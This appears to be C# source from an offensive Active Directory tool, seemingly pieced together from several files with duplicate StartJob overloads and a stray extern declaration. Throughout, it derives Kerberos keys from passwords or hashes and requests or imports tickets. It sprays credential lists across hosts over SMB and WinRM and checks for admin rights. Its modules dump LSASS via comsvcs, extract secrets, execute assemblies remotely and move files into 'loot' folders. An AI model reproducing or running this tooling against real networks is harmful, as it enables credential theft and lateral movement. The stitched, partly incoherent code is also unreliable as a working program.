public static string AskTicket(string user, string domain, string hash, KERB_ETYPE encType, string dc)
{
LUID luid = new LUID();
string ticketoutput = "";
var originalConsoleOut = Console.Out;
using (var writer = new StringWriter())
{
Console.SetOut(writer);
Ask.TGT(user, domain, hash, encType, null, true, dc, luid, false);
writer.Flush();
ticketoutput = writer.GetStringBuilder().ToString();
}
Console.SetOut(originalConsoleOut);
return(ticketoutput);
}
public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, List <string> flags)
{
string ticketoutput;
if (String.IsNullOrEmpty(ticket))
{
foreach (string user in users)
{
var secrets = hashes.Length > 0 ? hashes : passwords;
foreach (string secret in secrets)
{
string hash;
if (passwords.Length > 0)
{
string salt = String.Format("{0}{1}", domain.ToUpper(), user);
hash = Crypto.KerberosPasswordHash(encType, secret, salt);
}
else
{
hash = secret;
}
AToken.MakeToken("Fake", "Fake", "Fake");
Console.WriteLine("------------------");
Console.WriteLine(string.Format("[*] User: {0}", user));
Console.WriteLine(string.Format("[*] domain: {0}", domain));
Console.WriteLine(string.Format("[*] secret: {0}", secret));
ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
if (ticketoutput.Contains("[+] Ticket successfully imported!"))
{
Console.WriteLine("[+] Ticket successfully imported!");
}
else
{
Console.WriteLine("[-] Could not request TGT");
continue;
}
Console.WriteLine();
foreach (string computername in computernames)
{
Console.WriteLine(String.Format("[*] Checking {0}", computername));
if (!Misc.CheckHostPort(computername, 445))
{
Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername));
Console.WriteLine();
continue;
}
if (!Directory.Exists(Path.Combine("loot", computername)))
{
Directory.CreateDirectory(Path.Combine("loot", computername));
}
Smb.CheckLocalAdmin(computername, module);
Console.WriteLine("");
}
AToken.RevertFromToken();
}
}
}
else
{
AToken.MakeToken("Fake", "Fake", "Fake");
Console.WriteLine("------------------");
Console.WriteLine(string.Format("[*] Ticket: {0}", ticket));
ticketoutput = SecurityContext.ImportTicket(ticket);
if (ticketoutput.Contains("[+] Ticket successfully imported!"))
{
Console.WriteLine("[+] TGT imported successfully!");
}
else
{
Console.WriteLine("[-] Could not import TGT");
return;
}
Console.WriteLine();
foreach (string computername in computernames)
{
Console.WriteLine(String.Format("[*] Checking {0}", computername));
if (!Misc.CheckHostPort(computername, 445))
{
Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername));
Console.WriteLine();
continue;
}
if (!Directory.Exists(Path.Combine("loot", computername)))
{
Directory.CreateDirectory(Path.Combine("loot", computername));
}
Smb.CheckLocalAdmin(computername, module);
Console.WriteLine("");
}
AToken.RevertFromToken();
}
}
public static void KerberosSmb(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, List <string> flags)
{
StartJob(users, domain, passwords, hashes, ticket, encType, dc, computernames, module, moduleargument, flags);
//var listOfTasks = new List<Task>();
//listOfTasks.Add(new Task(() => StartJob(user, domain, hash, encType, outfile, ptt, dc, luid, describe, computernames, module, moduleargument)));
//Tasks.StartAndWaitAllThrottled(listOfTasks, 1);
}
public static extern int CDLocateCSystem(KERB_ETYPE type, out IntPtr pCheckSum);
public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List <string> flags)
{
AToken.MakeToken("Fake", "Fake", "Fake");
string ticketoutput;
if (String.IsNullOrEmpty(ticket))
{
foreach (string user in users)
{
var secrets = hashes.Length > 0 ? hashes : passwords;
foreach (string secret in secrets)
{
string hash;
if (passwords.Length > 0)
{
string salt = String.Format("{0}{1}", domain.ToUpper(), user);
hash = Crypto.KerberosPasswordHash(encType, secret, salt);
}
else
{
hash = secret;
}
Console.WriteLine("------------------");
Console.WriteLine(string.Format("[*] User: {0}", user));
Console.WriteLine(string.Format("[*] domain: {0}", domain));
Console.WriteLine(string.Format("[*] secret: {0}", secret));
ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
if (ticketoutput.Contains("[+] Ticket successfully imported!"))
{
Console.WriteLine("[+] Ticket successfully imported!");
}
else
{
Console.WriteLine("[-] Could not request TGT");
continue;
}
//ticket debugging
//List<LSA.SESSION_CRED> sessionCreds = LSA.EnumerateTickets(false, new LUID(), "", "", "", true);
//LSA.DisplaySessionCreds(sessionCreds, LSA.TicketDisplayFormat.Klist);
Console.WriteLine();
foreach (string computername in computernames)
{
Console.WriteLine(String.Format("[*] Checking {0}", computername));
if (!Misc.CheckHostPort(computername, 5985))
{
Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
Console.WriteLine();
continue;
}
if (!Directory.Exists(Path.Combine("loot", computername)))
{
Directory.CreateDirectory(Path.Combine("loot", computername));
}
if (module.Length == 0 || module.Contains("exec"))
{
Wsman.CheckLocalAdmin(computername, moduleargument, flags);
}
else if (module.Contains("comsvcs"))
{
Wsman.InvokeComSvcsLsassDump(computername);
}
else if (module.Contains("secrets") || module.Contains("secret"))
{
Wsman.GetSecrets(computername);
}
else if (module.Contains("assembly"))
{
Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
}
else if (module.Contains("download"))
{
Wsman.CopyFile(computername, path, destination);
}
else if (module.Contains("upload"))
{
Wsman.UploadFile(computername, path, destination);
}
Console.WriteLine("");
}
}
}
}
else
{
Console.WriteLine("------------------");
Console.WriteLine(string.Format("[*] Ticket: {0}", ticket));
ticketoutput = SecurityContext.ImportTicket(ticket);
if (ticketoutput.Contains("[+] Ticket successfully imported!"))
{
Console.WriteLine("[+] TGT imported successfully!");
}
else
{
Console.WriteLine("[-] Could not import TGT");
return;
}
//ticket debugging
//List<LSA.SESSION_CRED> sessionCreds = LSA.EnumerateTickets(false, new LUID(), "", "", "", true);
//LSA.DisplaySessionCreds(sessionCreds, LSA.TicketDisplayFormat.Klist);
Console.WriteLine();
foreach (string computername in computernames)
{
Console.WriteLine(String.Format("[*] Checking {0}", computername));
if (!Misc.CheckHostPort(computername, 5985))
{
Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername, flags));
Console.WriteLine();
continue;
}
if (!Directory.Exists(Path.Combine("loot", computername)))
{
Directory.CreateDirectory(Path.Combine("loot", computername));
}
if (module.Length == 0 || module.Contains("exec"))
{
Wsman.CheckLocalAdmin(computername, moduleargument, flags);
}
else if (module.Contains("comsvcs"))
{
Wsman.InvokeComSvcsLsassDump(computername);
}
else if (module.Contains("secrets") || module.Contains("secret"))
{
Wsman.GetSecrets(computername);
}
else if (module.Contains("assembly"))
{
Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
}
else if (module.Contains("download"))
{
Wsman.CopyFile(computername, path, destination);
}
else if (module.Contains("upload"))
{
Wsman.UploadFile(computername, path, destination);
}
Console.WriteLine("");
}
}
AToken.RevertFromToken();
}
public static void KerberosWinRm(string[] users, string domain, string[] passwords, string[] hash, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List <string> flags)
{
if (module.Contains("exec") && moduleargument.Length == 0)
{
Console.WriteLine("[-] Missing exec argument");
return;
}
if (module.Contains("assembly") && !File.Exists(path))
{
Console.WriteLine("[-] Missing assembly path");
return;
}
if (module.Contains("download") && (String.IsNullOrEmpty(path) || String.IsNullOrEmpty(destination)))
{
Console.WriteLine("[-] Need path and destination");
return;
}
if (module.Contains("upload") && (String.IsNullOrEmpty(path) || String.IsNullOrEmpty(destination)))
{
Console.WriteLine("[-] Need path and destination");
return;
}
StartJob(users, domain, passwords, hash, ticket, encType, dc, computernames, module, moduleargument, path, destination, flags);
//var listOfTasks = new List<Task>();
//listOfTasks.Add(new Task(() => StartJob(users, domain, passwords, hash, ticket, encType, dc, computernames, module, moduleargument, flags)));
//Tasks.StartAndWaitAllThrottled(listOfTasks, 1);
}
public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List <string> flags, string protocol)
{
AToken.MakeToken("Fake", "Fake", "Fake");
Console.WriteLine("------------------");
if (String.IsNullOrEmpty(ticket))
{
var secrets = hashes.Length > 0 ? hashes : passwords;
foreach (string user in users)
{
foreach (string secret in secrets)
{
string hash;
if (passwords.Length > 0)
{
string salt = String.Format("{0}{1}", domain.ToUpper(), user);
hash = Crypto.KerberosPasswordHash(encType, secret, salt);
}
else
{
hash = secret;
}
Console.WriteLine(string.Format("[*] User: {0}", user));
Console.WriteLine(string.Format("[*] Domain: {0}", domain));
Console.WriteLine(string.Format("[*] Secret: {0}", secret));
string ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
if (ticketoutput.Contains("[+] Ticket successfully imported!"))
{
Console.WriteLine("[+] Ticket successfully imported!");
}
else
{
Console.WriteLine("[-] Could not request TGT");
continue;
}
if (protocol.ToLower() == "smb")
{
Scan.SMB(computernames, module);
}
else if (protocol.ToLower() == "winrm")
{
Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
}
else if (protocol.ToLower() == "reg32")
{
Scan.REG32(computernames, module);
}
else if (protocol.ToLower() == "ldap")
{
Scan.LDAP(module, domain, dc);
}
}
}
}
else
{
Console.WriteLine(string.Format("[*] Ticket: {0}", ticket));
string ticketoutput = SecurityContext.ImportTicket(ticket);
if (ticketoutput.Contains("[+] Ticket successfully imported!"))
{
Console.WriteLine("[+] TGT imported successfully!");
}
else
{
Console.WriteLine("[-] Could not import TGT");
return;
}
if (protocol.ToLower() == "smb")
{
Scan.SMB(computernames, module);
}
else if (protocol.ToLower() == "winrm")
{
Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
}
else if (protocol.ToLower() == "reg32")
{
Scan.REG32(computernames, module);
}
else if (protocol.ToLower() == "ldap")
{
Scan.LDAP(module, domain, dc);
}
}
AToken.RevertFromToken();
}
public static void Kerberos(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List <string> flags, string protocol)
{
StartJob(users, domain, passwords, hashes, ticket, encType, dc, computernames, module, moduleargument, path, destination, flags, protocol);
//var listOfTasks = new List<Task>();
//listOfTasks.Add(new Task(() => StartJob(users, domain, passwords, hashes, ticket, encType, dc, computernames, module, moduleargument, path, destination, flags, protocol)));
//Tasks.StartAndWaitAllThrottled(listOfTasks, 1);
}
